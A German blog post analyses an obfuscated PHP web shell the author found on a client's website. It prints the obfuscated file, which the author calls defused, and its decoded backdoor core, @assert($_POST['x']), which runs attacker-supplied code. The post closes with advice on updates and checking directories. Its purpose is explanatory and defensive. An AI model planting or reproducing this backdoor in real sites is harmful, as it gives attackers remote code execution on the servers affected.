Über den Author / Sicherheit / PHP Trojaner mit php assert()

PHP Trojaner mit php assert()

~2 Min. Lesezeit

Für einen Kunden sollte ich eine Offerte erstellen um seine Seite technisch zu optimieren für Google. DAbei ist mir eine seltsame DAtei aufgefallen mit dem Namen s26e2.php.

Der Inhalt der Datei sieht folgendermassen aus (unschädlich gemacht:

${"\x47L\x4f\x42\x41LS"}["\x6c\x68\x73l\x61wk"]="c";$kvbemdpsn="c";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x78a\x77\x67\x6d\x6d\x70\x6c\x77o"]="b\x6b\x66";${"GLOB\x41L\x53"}["\x70tx\x75\x76\x74uij\x6d"]="\x76bl";${"\x47\x4c\x4fB\x41\x4c\x53"}["g\x6f\x6fl\x72\x7a"]="\x62\x6b\x66";${${"\x47\x4cO\x42\x41\x4c\x53"}["p\x74xu\x76\x74\x75\x69\x6a\x6d"]}=str_replace("\x74\x69","","\x74\x69st\x69t\x74ir\x74i\x5frt\x69\x65\x74\x69pl\x74i\x61t\x69\x63\x65");${${"G\x4cO\x42\x41\x4cS"}["\x68\x78\x61\x77gm\x6d\x70\x6c\x77\x6f"]}=${${"G\x4c\x4f\x42\x41\x4cS"}["\x70t\x78\x75\x76\x74\x75ijm"]}("\x6b","","\x6b\x62\x61k\x73\x6b\x65\x36\x6b\x34k\x5fkdk\x65\x6b\x63\x6b\x6f\x6b\x64ke");${${"\x47L\x4f\x42ALS"}["lh\x73\x6c\x61\x77\x6b"]}=${${"\x47\x4cO\x42B\x4c\x53"}["g\x6f\x6f\x6cr\x7a"]}("YX\x4ezZX\x49=").$_GET["n"]."\x74";@${$kvbemdpsn}($_POST["x"]);echo "a\x62c\x61\x62cab\x63\n";

Schlüsselt man diese Datei auf und entfernt alles was man nicht benötigt, kommt dies raus:

@assert($_POST["x"]);
echo "abcabcabc\n";

Klar könnte man den letzten Teil auch noch entfernen… Nette Datei, entschlüsselt in rund 15 Minuten und wieder was gelernt, denn die Funktion habe ich tatsächlich noch nie genutzt oder gwas davon gehört…

Hätte der Kunde seine Updates schön gemacht (Fremdhoster) dann wäre dies vermutlich nicht passiert. Ob die Seite noch mehr Infektionen hat, ist mir unbekannt, da ich nicht danach gesucht habe und aktuell keinen Bereinigungsauftrag habe.

Es macht Sinn, ab und zu die Verzeichnisse durchzuschauen, ob seltsame Dateien drin liegen 😉

About Stefan

Ein männlicher IT Nerd, durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf. Immer hilfsbereit wenn Probleme zu lösen sind oder das Unmögliche umgesetzt werden sollte.

Weitere interessante Artikel

WordPress Installer

~0 Min. LesezeitUm WordPress auf einem Hosting zu installieren, muss dieses imemr zuerst heruntergeladen und …

WordPress Multi mit verschiedenen Domains einrichten

~0 Min. LesezeitUm mehrere Domains separat innerhalb von WordPress zu verwalten, kann man eine MultiSite …

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

eMail-Benachrichtigung bei weiteren Kommentaren.
Auch möglich: Abo ohne Kommentar.